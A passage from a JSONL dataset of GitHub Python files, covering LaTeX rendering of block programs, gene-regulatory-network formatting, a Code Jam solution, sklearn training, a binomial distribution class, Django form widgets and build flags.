arr[-1] or 'repeat' in arr[-1] or 'while' in arr[-1] or \\\n 'repeat_until_goal' in arr[-1] or 'do' in arr[-1] or 'else' in arr[-1]:\n new_arr.append(arr[-1])\n new_arr.append('children[')\n new_arr.append(']')\n else:\n new_arr.append(arr[-1])\n\n return new_arr\n\n\n\n\n\n\ndef get_arr_with_tokens(arr: list, fill_in_blank=False):\n tokens_arr = []\n mcq_sol = ''\n for i, ele in enumerate(arr):\n if 'repeat' in ele or 'ifelse' in ele or 'while' in ele or \\\n 'repeat_until_goal' in ele or 'if_only' in ele or 'if_else' in ele or 'if' in ele:\n if 'deleted!' not in ele and 'added!' not in ele and 'replaced!' not in ele:\n s = ele.split('(')\n t = s[0]\n t_latex = latex_dict[t]\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append(t_latex+'\\\\textcode{('+cond_latex+')}')\n else:\n if 'deleted!' in ele:\n if 'deleted!' in ele:\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{*token-deleted*}}\\\\\\\\')\n else:\n split_ = ele.split('!')\n s = split_[1].split('(')\n t = s[0]\n t_latex = latex_dict[t]\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{' + t_latex + '\\\\textcode{(' + cond_latex + ')}}}')\n\n elif ele == 'children[':\n tokens_arr.append(ele)\n elif ele == ']':\n tokens_arr.append(ele)\n elif 'do' in ele:\n if 'deleted!' not in ele and 'added!' not in ele and 'replaced!' not in ele:\n t_latex = latex_dict[ele]\n s_parent = arr[i-2]\n s = s_parent.split('(')\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append(t_latex + '\\\\textcode{(' + cond_latex + ')}')\n else:\n if 'deleted!' in ele:\n if 'deleted!' in ele:\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{*token-deleted*}}\\\\\\\\')\n else:\n split_ = ele.split('!')\n t_latex = latex_dict[split_[1]]\n s_parent = arr[i - 2]\n s = s_parent.split('(')\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append('\\\\framebox[1\\width]{\\\\textcolor{red}{' + t_latex + '\\\\textcode{(' + cond_latex + ')}}}')\n else:\n if 'blank_' in ele:\n mcq_sol = ele.split('_')[1:]\n mcq_sol = ''.join(mcq_sol)\n ## add the latex script for a empty box with '?'\n if fill_in_blank:\n token_filled = mcq_sol_dict[mcq_sol]\n tokens_arr.append('\\\\framebox[1.5\\width]{' + token_filled + '}\\\\\\\\')\n else:\n tokens_arr.append('\\\\framebox[8.0\\width]{?}\\\\\\\\')\n elif 'deleted!' in ele or 'added!' in ele or 'replaced!' in ele:\n token = ele.split('!')\n if 'deleted!' in ele:\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{*token-deleted*}}\\\\\\\\')\n else:\n tokens_arr.append('\\\\framebox[1.5\\width]{\\\\textcolor{red}{' + latex_dict[token[1]][:-2] + '}}\\\\\\\\')\n else:\n tokens_arr.append(latex_dict[ele])\n\n return tokens_arr, mcq_sol\n\n\n\n\n\n\n\n\ndef get_latex_code(t_arr: list):\n\n brac_arr = []\n quad_arr = []\n script = []\n space = ''\n for i, ele in enumerate(t_arr):\n if ele == 'children[':\n if 'ifelse' in t_arr[i-1] or 'if_else' in t_arr[i-1] or 'if_only' in t_arr[i-1] or 'if' in t_arr[i-1]:\n script.append('')\n brac_arr.append('')\n quad_arr.append(space)\n space = quad_arr[-1]\n else:\n script.append('\\\\textcode{\\{}\\\\\\\\'+'\\n')\n brac_arr.append(space + '\\\\textcode{\\}}\\\\\\\\' + '\\n')\n quad_arr.append(space + '\\quad')\n space = quad_arr[-1]\n elif ele == ']':\n brac = brac_arr.pop()\n script.append(brac)\n quad_arr.pop()\n if len(quad_arr) == 0:\n space = ''\n else:\n space = quad_arr[-1]\n elif ele == '\\DSLMove\\\\\\\\' or ele == '\\DSLTurnLeft\\\\\\\\' or \\\n ele == '\\DSLTurnRight\\\\\\\\' or ele == '\\DSLPickMarker\\\\\\\\' or \\\n ele == '\\DSLPutMarker\\\\\\\\' or ele == '\\SDSLAction\\\\\\\\' or ele == '\\\\framebox[8.0\\width]{?}\\\\\\\\':\n script.append(space + ele + '\\n')\n elif 'ifelse' in ele or 'if_else' in ele or 'if_only' in ele or 'if' in ele:\n continue\n else:\n script.append(space + ele)\n\n return script\n\n\n\ndef get_full_latex_script(code_file, macros_file = MACROS):\n\n macros = get_macros(macros_file)\n ### beginning script\n begin_script = \"\\n\\\\begin{document}\\n\" \\\n \"\\\\begin{boxcode}{5cm}{0.75}{0.58}\\n\"\n\n ### ending script\n end_script = \"\\\\\\\\\\n\" \\\n \"\\end{boxcode}\\n\" \\\n \"\\end{document}\"\n\n with open(code_file, 'r') as f:\n code_json = json.load(f)\n\n clean_arr = get_string_from_json(code_json)\n c_arr = check_token_arr(clean_arr)\n t_arr, _ = get_arr_with_tokens(c_arr)\n\n code_script = get_latex_code(t_arr)\n final_script = macros + begin_script\n for ele in code_script:\n final_script = final_script + ele\n final_script = final_script + end_script\n\n return final_script\n\n\ndef get_code_image(jsoncodefile:str, codefolder:str, codeimg:str):\n script = get_full_latex_script(codefile)\n\n with open(codefolder + \"/\" + codeimg + '.tex', 'w') as fp:\n fp.write(\"%s\" % script)\n\n # generate the image file\n input_path = codefolder + '/' + codeimg + '.tex'\n os_cmd = \"pdflatex -interaction=nonstopmode -output-directory \" + codefolder + \" %s\"\n os.system(os_cmd % (input_path))\n output_path = codefolder + \"/\" + codeimg + '.jpg'\n os_cmd = \"convert -density 1200 -quality 100 \" + codefolder + \"/\" + codeimg + \".pdf %s\"\n os.system(os_cmd % (output_path))\n\n print(\"Generated code image\")\n return 0\n\n","repo_name":"machine-teaching-group/aied2022_pquizsyn","sub_path":"code/utils/gen_code_image.py","file_name":"gen_code_image.py","file_ext":"py","file_size_in_byte":10926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"38580188654","text":"import json\nimport logging\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\n\n__functions_in_ScenicSergioFlow__ = {\n \"self.open_adjacency_from_filepath_input\", \n \"self.make_grn_sergio\",\n \"self.make_one_state_grn\",\n \"self.group_interactions\",\n \"self.add_interaction\",\n \"self.trim_interactions\",\n \"self.unique_ids_master_regulons_non_regulons_pairs\",\n}\n\n\nclass ScenicSergioFlow(object):\n def __init__(self,\n filepath_to_save_interactions: str,\n filepath_to_save_regulons: str,\n select_percentile_adjacency=100,\n filepath_control_adjacency: str = None,\n filepath_disease_adjacency: str = None,\n filepath_save_gene_name_to_id_mapping: str = None\n ):\n \"\"\"\n Output Adjacencies from scenic comes as: columns are in order of {TF \\tab Target \\tab Importance}\n select_percent_adjacency: the portion of the original matrix to work with\n \"\"\"\n self.control_filepath = filepath_control_adjacency\n self.disease_filepath = filepath_disease_adjacency\n self.filepath_to_save_interactions = filepath_to_save_interactions\n self.filepath_to_save_regulons = filepath_to_save_regulons\n self.select_percent_adjacency = select_percentile_adjacency\n self.filepath_save_gene_name_to_id_mapping = filepath_save_gene_name_to_id_mapping\n self.control_adjacency = self.disease_adjacency = None\n\n self.possible_states_adjacency = {\n \"control\": self.control_adjacency,\n \"disease\": self.disease_adjacency,\n \"both\": (self.control_adjacency, self.disease_adjacency)\n }\n\n self.filepaths_states = {\"control\": self.control_filepath, \"disease\": self.disease_filepath}\n\n def open_adjacency_from_filepath_input(self, open_both=False, which_state_to_open=\"\"):\n if open_both:\n self.control_adjacency = np.load(self.control_filepath, allow_pickle=True)\n self.disease_adjacency = np.load(self.disease_filepath, allow_pickle=True)\n return self.control_adjacency, self.disease_adjacency\n else:\n if not open_both and which_state_to_open in self.possible_states_adjacency.keys():\n self.possible_states_adjacency[which_state_to_open] = np.load(\n self.filepaths_states[which_state_to_open], allow_pickle=True\n )\n return self.possible_states_adjacency[which_state_to_open]\n\n def make_grn_sergio(self, make_one_state_only=False, make_which_state=\"control\"):\n if make_one_state_only and make_which_state in self.possible_states_adjacency.keys():\n self.possible_states_adjacency[make_which_state] = self.open_adjacency_from_filepath_input(\n open_both=False, which_state_to_open=make_which_state\n )\n self.make_one_state_grn(self.possible_states_adjacency[make_which_state])\n else:\n self.control_adjacency, self.disease_adjacency = self.open_adjacency_from_filepath_input(open_both=True)\n self.make_two_states_grn()\n\n def make_one_state_grn(self, adjacency):\n if self.select_percent_adjacency is not None:\n adjacency = self.trim_interactions(adjacency)\n\n cycle_edges_tobe_removed = self._break_cycles(adjacency)\n # logging.info(\"The interactions to be ignored/removed: \", cycle_edges_tobe_removed)\n tot_unique_ids, master_regulons, non_regulons_pairs = self.unique_ids_master_regulons_non_regulons_pairs(\n adjacency)\n genes_ids_to_names_mapping = {k: v for v, k in enumerate(tot_unique_ids)}\n self.save_gene_ids_to_their_name_dict(genes_ids_to_names_mapping)\n interactions_tfs_per_target_gene = self.format_sergio(\n adjacency,\n master_regulons,\n genes_ids_to_names_mapping,\n cycle_edges_tobe_removed,\n )\n # interactions_tfs_per_target_gene = self.group_interactions(\n # adjacency,\n # genes_ids_to_names_mapping,\n # cycle_edges_tobe_removed\n # )\n logging.info(\"Saving the interactions to a txt file...\")\n self.save_interactions_to_txt_file(interactions_tfs_per_target_gene)\n print(\"Done formatting pySCENIC GRN to SERGIO format.\")\n\n def group_interactions(self, adjacency, genes_names_to_ids_mapping, interactions_to_ignore):\n \"\"\"\n Each tf is added to the bounded gene in the dictionary.\n Example: {gene: ([tfs],[importance_values])}.\n Each interaction is a tuple of (tf, target_gene, importance).\n \"\"\"\n interactions_tfs_per_target_gene = {}\n for interaction in adjacency:\n interactions_tfs_per_target_gene = self.add_interaction(\n interaction,\n interactions_to_ignore,\n genes_names_to_ids_mapping,\n interactions_tfs_per_target_gene\n )\n return interactions_tfs_per_target_gene\n\n @staticmethod\n def add_interaction(\n interaction,\n edges_to_ignore,\n genes_names_to_ids_mapping,\n interactions_tfs_per_target_gene\n ):\n tf, target_gene, importance = interaction\n if (tf, target_gene) in edges_to_ignore:\n print(f\"Ignored this interaction: ({tf} -> {target_gene})!\")\n return interactions_tfs_per_target_gene\n encoded_tf = genes_names_to_ids_mapping[tf]\n encoded_target_gene = genes_names_to_ids_mapping[target_gene]\n if encoded_target_gene not in interactions_tfs_per_target_gene:\n interactions_tfs_per_target_gene[encoded_target_gene] = ([encoded_tf], [importance])\n else:\n interactions_tfs_per_target_gene[encoded_target_gene][0].append(encoded_tf)\n interactions_tfs_per_target_gene[encoded_target_gene][1].append(importance)\n return interactions_tfs_per_target_gene\n\n def trim_interactions(self, adjacency):\n \"\"\"Take only the target-TF interaction above this threshold. The original adjacency matrix is huge\n and this simplifies the initial implementation\"\"\"\n select_until_row_x = int(len(adjacency) * (self.select_percent_adjacency / 100))\n adjacency = adjacency[:select_until_row_x]\n logging.info(f\"The trimmed adjacency has now #{select_until_row_x} interactions.\")\n return adjacency\n\n def unique_ids_master_regulons_non_regulons_pairs(self, adjacency):\n tfs = adjacency[:, 0]\n targets = adjacency[:, 1]\n regulons = np.setdiff1d(tfs, targets)\n non_regulons_pairs = [(tf, target) for tf, target in zip(tfs, targets) if tf not in regulons]\n\n tot_ids_with_replicates = np.zeros(len(tfs) + len(targets), dtype=object)\n tot_ids_with_replicates[:len(tfs)] = tfs\n tot_ids_with_replicates[len(tfs):] = targets\n tot_unique_ids = np.unique(tot_ids_with_replicates)\n print(f\"Found unique TFs/genes {len(tot_unique_ids)}.\")\n\n return tot_unique_ids, regulons, non_regulons_pairs\n\n def save_gene_ids_to_their_name_dict(self, genes_ids_to_their_names_dict):\n with open(f\"{self.filepath_save_gene_name_to_id_mapping}\", \"w\") as file:\n json.dump(genes_ids_to_their_names_dict, file)\n\n def draw_graph(self, regulons_list, non_regulons_pairs, edges) -> []:\n \"\"\"Based on https://stackoverflow.com/questions/20133479/how-to-draw-directed-graphs-using-networkx-in-python\"\"\"\n G = nx.DiGraph()\n G.add_edges_from(edges)\n\n val_map = {master_regulon: np.random.rand() for master_regulon in regulons_list}\n values = [val_map.get(node, 0.2) for node in G.nodes()]\n\n regulons_edges_red_edges = [edge for edge in G.edges() if edge not in non_regulons_pairs]\n\n plt.figure(1, figsize=(12, 12))\n pos = nx.spring_layout(G)\n nx.draw_networkx_nodes(G, pos, cmap=plt.get_cmap('jet'), node_color=values, node_size=500)\n nx.draw_networkx_labels(G, pos)\n nx.draw_networkx_edges(G, pos, edgelist=regulons_edges_red_edges, edge_color='r', arrows=True)\n nx.draw_networkx_edges(G, pos, edgelist=non_regulons_pairs, arrows=True)\n plt.title(\"Gene Regulatory network - non master regulons have the same node color\")\n\n plt.show()\n\n try:\n cycle_edge = nx.find_cycle(G)\n print(cycle_edge)\n return cycle_edge\n except nx.exception.NetworkXNoCycle:\n return []\n\n def _break_cycles(self, adjacency):\n break_cycles = False\n cycle_edges = []\n edges = [(i[0], i[1]) for i in adjacency]\n while not break_cycles:\n cycle_edges_ = self.check_if_graph_is_cycled(edges)\n cycle_edges += cycle_edges_\n edges = [(i[0], i[1]) for i in adjacency if (i[0], i[1]) not in cycle_edges]\n if not cycle_edges_:\n break_cycles = True\n return cycle_edges\n\n @staticmethod\n def check_if_graph_is_cycled(edges) -> []:\n G = nx.DiGraph()\n G.add_edges_from(edges)\n try:\n cycle_edge = nx.find_cycle(G)\n return cycle_edge\n except nx.exception.NetworkXNoCycle:\n return []\n\n def format_sergio(self, adjacency, regulons_list, genes_names_to_indices, edges_to_ignore):\n interactions_tfs_per_target_gene = {}\n visited_regulons = {k: False for k in regulons_list}\n\n with open(self.filepath_to_save_regulons, \"w\") as file_regulons:\n for interaction in adjacency:\n tf, target_gene, importance = interaction\n\n if tf in regulons_list and not visited_regulons[tf]:\n file_regulons.write(f\"{float(genes_names_to_indices[tf])},0.1,0.1\\n\") # TODO replace 0.1\n visited_regulons[tf] = True\n\n encoded_tf = genes_names_to_indices[tf]\n encoded_target_gene = genes_names_to_indices[target_gene]\n if encoded_target_gene not in interactions_tfs_per_target_gene:\n interactions_tfs_per_target_gene[encoded_target_gene] = ([encoded_tf], [importance])\n else:\n interactions_tfs_per_target_gene[encoded_target_gene][0].append(encoded_tf)\n interactions_tfs_per_target_gene[encoded_target_gene][1].append(importance)\n\n return interactions_tfs_per_target_gene\n\n def save_interactions_to_txt_file(self, interactions_tfs_per_target_gene):\n with open(self.filepath_to_save_interactions, \"w\") as file:\n for target_gene_index, (tfs, importances) in interactions_tfs_per_target_gene.items():\n assert len(tfs) == len(importances), \"Error in creating the target genes dictionary!\"\n tf_for_target_gene_ids = \",\".join([str(float(tf)) for tf in tfs])\n importance_values_to_str = \",\".join([str(importance) for importance in importances])\n file.write(f\"{float(target_gene_index)},{float(len(tfs))},{tf_for_target_gene_ids},\"\n f\"{importance_values_to_str}\\n\")\n\n def save_master_regulons_to_txt_file(self, master_regulons_list):\n pass\n\n def make_two_states_grn(self):\n if self.select_percent_adjacency != 100:\n\n if self.select_percent_adjacency <= 0 or isinstance(self.select_percent_adjacency, float):\n raise EnvironmentError(\"'select_percent_adjacency' should be a int between [1,99]\")\n\n self.trim_interactions(by_control_adjacency=True)\n tot_unique_ids_control, master_regulons_control = self.unique_ids_and_master_regulons(self.control_adjacency)\n tot_unique_ids_d, master_regulons_d = self.unique_ids_and_master_regulons(self.disease_adjacency)\n genes_names_to_ids_mapping = {k: v for v, k in enumerate(tot_unique_ids_control)}\n self.save_gene_ids_to_their_name_dict(genes_names_to_ids_mapping, \"./scenicsergio/genes_ids_mapping.json\")\n self.interactions_tfs_per_target_gene = {}\n visited_regulons = {k: False for k in tot_unique_ids_control}\n with open(self.filepath_to_save_regulons, \"w\") as file_regulons:\n for interaction in self.control_adjacency:\n tf, target_gene, importance_c = interaction\n\n match_in_disease = (self.disease_adjacency[:, 0] == tf) & (self.disease_adjacency[:, 1] == target_gene)\n found_interaction_in_disease_too, = np.where(match_in_disease)\n\n if tf in master_regulons_control and tf in master_regulons_d and not visited_regulons[tf]:\n # if found_interaction_in_disease_too:\n _, _, importance_d = self.disease_adjacency[found_interaction_in_disease_too].squeeze()\n file_regulons.write(f\"{float(genes_names_to_ids_mapping[tf])},{importance_c},{importance_d}\\n\")\n visited_regulons[tf] = True\n break\n\n if tf not in master_regulons_control and tf not in master_regulons_d:\n if found_interaction_in_disease_too:\n _, _, importance_d = self.disease_adjacency[found_interaction_in_disease_too].squeeze()\n\n avg_importance = (importance_c + importance_d) / 2\n self.add_interaction(genes_names_to_ids_mapping, avg_importance, target_gene, tf)\n else:\n self.add_interaction(genes_names_to_ids_mapping, importance_c, target_gene, tf)\n else:\n logging.critical(\"Skipping the case when on gene is master in ony state only.\")\n print(\"Done formatting pySCENIC GRN to SERGIO format.\")\n","repo_name":"ioneliabuzatu/TOC","sub_path":"scenicsergio/scenic_sergio_flow.py","file_name":"scenic_sergio_flow.py","file_ext":"py","file_size_in_byte":13750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23606384481","text":"import sys\r\n\r\nfp = open('small.in', 'r')\r\nout = open('output', 'w')\r\n#out = sys.stdout\r\ncases = int(fp.readline())\r\n\r\nfor case in range(cases):\r\n parms = [int(x) for x in fp.readline().split()]\r\n sizes = [int(x) for x in fp.readline().split()]\r\n \r\n rides = parms[0]\r\n cap = parms[1]\r\n \r\n group = 0\r\n result = 0\r\n for x in range(rides):\r\n dentro = 0\r\n jafoi = 0\r\n primeiro = group\r\n while dentro + sizes[group] <= cap:\r\n if jafoi and group == primeiro:\r\n break\r\n# print sizes[group],\r\n dentro += sizes[group]\r\n result += sizes[group]\r\n group = (group + 1) % len(sizes)\r\n jafoi = 1\r\n# print\r\n \r\n out.write('Case #' + str(case + 1) + ': ' + str(result) + '\\n')\r\n case += 1\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_55/755.py","file_name":"755.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22906817578","text":"from sklearn import *\nfrom process_data import *\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\n\ndef train_test_model(name, m1, X_train, Y_train, X_test, Y_test):\n# name, m1, X_train, Y_train, X_test, Y_test = args\n print(m1)\n #parameters = {'C':[1, 10], 'epsilon':[0.01,0.05,0.1],'tol':[0.01, 0.001, 0.1,0.005],'max_iter':[1000,5000,10000]}\n #teste = GridSearchCV(m1,parameters,n_jobs=-1,cv = 3)\n #teste = ml\n #teste.fit(X_train, Y_train)\n m1.fit(X_train, Y_train)\n\n y_pred = m1.predict(X_test)\n results = open('out_%s' % (name), 'w')\n results.write(\"R2 Score: %.2f\\n\" % (metrics.r2_score(Y_test, y_pred)))\n results.write(\"Explained Variance Score: %.2f\\n\" % (metrics.explained_variance_score(Y_test, y_pred)))\n results.write(\"Mean Absolute Error: %.2f\\n\" % (metrics.mean_absolute_error(Y_test, y_pred)))\n results.write(\"Mean Squared Error: %.2f\\n\" % (metrics.mean_squared_error(Y_test, y_pred)))\n results.write(\"Median Absolute Error: %.2f\\n\" % (metrics.median_absolute_error(Y_test, y_pred)))\n results.close()\n ex = pd.DataFrame(columns=['real', 'pred'])\n ex['real'] = Y_test\n ex['pred'] = y_pred\n ex.to_csv('%s.csv' % name, index=False, sep=\";\")\n externals.joblib.dump(m1, \"%s.pkl\" % name, compress=9)\n\n\nif __name__ == '__main__':\n X, Y = load_processed_data_test()\n X_train, X_test, Y_train, Y_test = cross_validation.train_test_split(X, Y, test_size=0.33, random_state=42)\n #m1 = svm.LinearSVR()\n #ml = GradientBoostingClassifier(n_estimators=5000, learning_rate=2**(-9.5), max_features='log2', max_depth=7, random_state=1, verbose=1)\n m1 = LogisticRegression(C=10.0, multi_class='multinomial', solver='lbfgs', verbose=1)\n name = \"LogisticRegression\"\n #externals.joblib.dump((X, Y, X_train, Y_train, X_test, Y_test), \"dataset.pkl\", compress=9)\n train_test_model(name, m1, X_train, Y_train, X_test, Y_test)\n","repo_name":"tatianacdemello/Teste","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3215950389","text":"import pkgutil\nimport inspect\nimport importlib\n\nfrom vizuka.dimension_reduction import (\n projector,\n pca,\n tsne,\n )\n\nfrom vizuka.plugins import dimension_reduction as projector_plugins\n\ndef list_projectors():\n \"\"\"\n List all projector available (in vizuka/plugin/dimension_reduction\n and vizuka/dimension_reduction)\n\n :return: a dict {method_name:projector_class}\n \"\"\"\n built_in_projectors = {\n 'pca':pca.PCA,\n 'tsne':tsne.tSNE,\n }\n\n extra_projectors= {}\n \n for (module_loader, name, ispkg) in pkgutil.iter_modules(projector_plugins.__path__):\n plugin = importlib.import_module('.plugins.dimension_reduction.'+name, 'vizuka')\n members = inspect.getmembers(plugin)\n for _, class_ in members:\n if class_ in projector.Projector.__subclasses__():\n extra_projectors[name] = class_\n\n return built_in_projectors, extra_projectors\n \n\ndef make_projector(method='tsne', **kwargs):\n \"\"\"\n Return a projector contructor\n\n :param method: the name of the algo\n :param kwargs: additional argument (e.g: perplexity for tsne)\n \"\"\"\n \n built_in_projectors, extra_projectors = list_projectors()\n available_projectors= {**built_in_projectors, **extra_projectors}\n \n projector_builder = available_projectors.get(method, None)\n \n return projector_builder\n","repo_name":"0011001011/vizuka","sub_path":"vizuka/dimension_reduction/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"61"} +{"seq_id":"34585519829","text":"from neomodel import (db, StructuredNode, StringProperty, UniqueIdProperty, UniqueProperty, RelationshipTo)\nfrom .nodeutils import NodeUtils\n\n\nclass Assumption(StructuredNode, NodeUtils):\n uid = UniqueIdProperty()\n name = StringProperty(unique_index=True)\n description = StringProperty()\n\n algorithms = RelationshipTo('.dm_algorithm.DataMiningAlgorithm', 'IS_ASSUMPTION_OF')\n\n @property\n def serialize(self):\n return {\n 'node_properties': {\n 'node_id': self.node_id,\n 'name': self.name,\n 'description': self.description\n }\n }\n\n @property\n def serialize_connections(self):\n return [\n {\n 'nodes_type': 'Algorithm',\n 'nodes_related': self.serialize_relationships(self.algorithms.all())\n }\n ]\n","repo_name":"lidija-jovanovska/ml-algorithms-annotator","sub_path":"web-annotator/controller/api/models/assumption.py","file_name":"assumption.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19607626723","text":"'''\nCreated on Sep 19, 2015\n\n@author: Philip Schulz\n'''\n\nfrom random import Random, shuffle\nfrom math import factorial\n\nclass BinomialDistribution(object):\n '''\n This class implements the binomial distribution with parameters n and theta, where n\n is the number i.i.d. random binary decisions and theta is the probability for a success.\n Successes and failures can be arbitrary objects.\n '''\n\n success = None\n failure = None\n n = None\n theta = None\n random_generator = None\n\n def __init__(self, success, failure, n = 10, theta = 0.5):\n '''\n Constructor\n \n @param success: the value of a success\n @param failure: the value of a failure\n @param n: the value of the parameter n\n @param theta: the value of the parameter theta\n @raise ValueError: if theta is outside [0,1] or n <= 0 \n '''\n \n self.set_n(n)\n self.set_theta(theta)\n self.success = success\n self.failure = failure\n self.random_generator = Random()\n \n def set_n(self, n):\n '''\n Set a new value for the parameter n.\n \n @param n: the new value for n\n @raise ValueError: if n <= 0\n '''\n \n if n < 1:\n raise ValueError(\"The argument n needs to be strictly greater than 0.\")\n \n self.n = n\n \n \n def set_theta(self, theta):\n '''\n Set a new value for the parameter theta.\n \n @param theta: the new value for the parameter theta\n @raise ValueError: if theta is outside [0,1]\n '''\n \n if theta < 0 or theta > 1:\n raise ValueError(\"The argument theta needs to lie in [0,1].\")\n \n self.theta = theta\n \n def compute_probability(self, k):\n '''\n Compute the probability of obtaining exactly k successes.\n \n @param k: the number of successes\n @return The probability of obtaining exactly the specified number of successes\n @raise ValueError: if k > n or k < 0\n '''\n \n if k > self.n:\n raise ValueError(\"There cannot be more successes than draws. Decrease k!\")\n elif k < 0:\n raise ValueError(\"The number of successes has to be positive.\")\n \n binomial_coefficient = factorial(self.n)/(factorial(k)*factorial(self.n-k))\n return binomial_coefficient*(self.theta**k)*((1-self.theta)**(self.n-k))\n \n def sample_with_k_successes(self, k):\n '''\n Randomly sample an outcome with exactly k successes.\n \n @param k: the number of successes\n @return: A randomly sampled outcome with exactly k successes.\n @raise ValueError: if k > n or k < 0\n '''\n \n if k > self.n:\n raise ValueError(\"There cannot be more successes than draws. Decrease k!\")\n elif k < 0:\n raise ValueError(\"The number of successes has to be positive.\")\n \n sampled_value = list()\n for i in xrange(k):\n sampled_value.append(self.success)\n for i in xrange(self.n-k):\n sampled_value.append(self.failure)\n \n shuffle(sampled_value)\n return sampled_value\n \n def sample(self):\n '''\n Samples a random outcome from this distribution.\n \n @return A randomly sampled outcome from this distribution in form of a list.\n '''\n \n threshold = self.random_generator.random()\n total = 0\n for k in xrange(self.n+1):\n total += self.compute_probability(k)\n if total > threshold:\n return self.sample_with_k_successes(k)\n \n def sample_list(self, m):\n '''\n Samples m random outcomes from this distribution.\n \n @param m: The number of outcomes to be sampled\n @return A list of k random outcomes from this distribution.\n @raise ValueError: if m < 1\n '''\n \n result = list()\n \n for i in xrange(m):\n result.append(self.sample())\n \n return result","repo_name":"BasicProbability/PythonCode_Fall2015","sub_path":"src/week4_debugging_and_testing/distributions_solution.py","file_name":"distributions_solution.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41711846438","text":"\"\"\"\n Contains widgets used for Slumber.\n\"\"\"\nfrom django import forms\nfrom django.contrib.admin.widgets import AdminURLFieldWidget\n\nfrom slumber.connector.api import _InstanceProxy, get_instance\nfrom slumber.scheme import from_slumber_scheme\nfrom slumber.server import get_slumber_services\n\n\nclass RemoteForeignKeyWidget(forms.TextInput):\n \"\"\"A widget that allows the URL to be edited.\n \"\"\"\n def render(self, name, value, **kw):\n if isinstance(value, basestring):\n return super(RemoteForeignKeyWidget, self).render(\n name, value, **kw)\n else:\n return super(RemoteForeignKeyWidget, self).render(\n name, value._url if value else None, **kw)\n\n\nclass RemoteForeignKeyField(forms.Field):\n \"\"\"A simple widget that allows the URL for the remote object to be\n seen and edited.\n \"\"\"\n def __init__(self, max_length=None, verify_exists=True,\n model_url=None, **kwargs):\n assert model_url, \"RemoteForiegnKeyField must be passed a model_url\"\n self.max_length = max_length\n self.model_url = model_url\n self.verify_exists = verify_exists\n default = {'widget': RemoteForeignKeyWidget}\n default.update(kwargs)\n if default['widget'] == AdminURLFieldWidget:\n # We have to ignore a request for admin's broken widget\n default['widget'] = RemoteForeignKeyWidget\n super(RemoteForeignKeyField, self).__init__(**default)\n\n def clean(self, value):\n if not value:\n if self.required:\n raise forms.ValidationError('This field is required')\n return None\n elif isinstance(value, _InstanceProxy):\n return value\n else:\n try:\n model_url = from_slumber_scheme(\n self.model_url, get_slumber_services())\n instance = get_instance(model_url, value, None)\n unicode(instance)\n except AssertionError:\n raise forms.ValidationError(\"The remote object doesn't exist\")\n return instance\n","repo_name":"hotkit/django-slumber","sub_path":"slumber/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"61"} +{"seq_id":"3893268180","text":"from setuptools import setup, Extension, find_packages\nfrom setuptools.dist import Distribution\nfrom pkg_resources import resource_string\nimport os\nimport platform\n\n\nclass BinaryDistribution(Distribution):\n \"\"\"\n Subclass the setuptools Distribution to flip the purity flag to false.\n See http://lucumr.pocoo.org/2014/1/27/python-on-wheels/\n \"\"\"\n def is_pure(self):\n # TODO: verify whether this is still necessary in Python v2.7\n return False\n\n\nSRC_ROOT = 'phraser/'\n\n\n# 1. Base flags.\n# 2. Max out warnings.\n# 3. Disable some warnings.\n# 4. Disable more warnings for LAPOS.\nCOMMON_BASE_FLAGS = (\"\"\"\n -std=c++11\n -O3\n -I%s\n\"\"\" % SRC_ROOT).split()\n\n\nCOMMON_LAPOS_FLAGS = \"\"\"\n -Wno-sign-conversion\n -Wno-old-style-cast\n -Wno-sign-compare\n -Wno-float-equal\n -Wno-unused-variable\n -Wno-unused-parameter\n -Wno-unused-function\n\"\"\".split()\n\n\nCLANG_BASE_FLAGS = \"\"\"\n -Wall\n -Wextra\n -Wpedantic\n\"\"\".split()\n\n\nCLANG_DISABLE_FLAGS = \"\"\"\n -Wno-padded\n -fcolor-diagnostics\n -ferror-limit=5\n -Wno-c++98-compat-pedantic\n -Wno-covered-switch-default\n -Wno-weak-vtables\n -Wno-global-constructors\n -Wno-implicit-fallthrough\n\"\"\".split()\n\n\nCLANG_LAPOS_FLAGS = \"\"\"\n -Wno-exit-time-destructors\n -Wno-shorten-64-to-32\n\"\"\".split()\n\n\n# C++ source naming convention:\n# * Main files end with .cpp\n# * Everything else ends with .cc\ndef find_cc_files(root_dir):\n ff = []\n for root, dirs, files in os.walk(root_dir):\n for name in files:\n if name.endswith('.cc'):\n f = os.path.join(root, name)\n ff.append(f)\n return ff\n\n\nUBUNTU_VERSION_F = '/etc/lsb-release'\nRELEASE_FIELD_NAME = 'DISTRIB_RELEASE'\n\n\ndef get_ubuntu_release():\n with open(UBUNTU_VERSION_F) as f:\n lines = 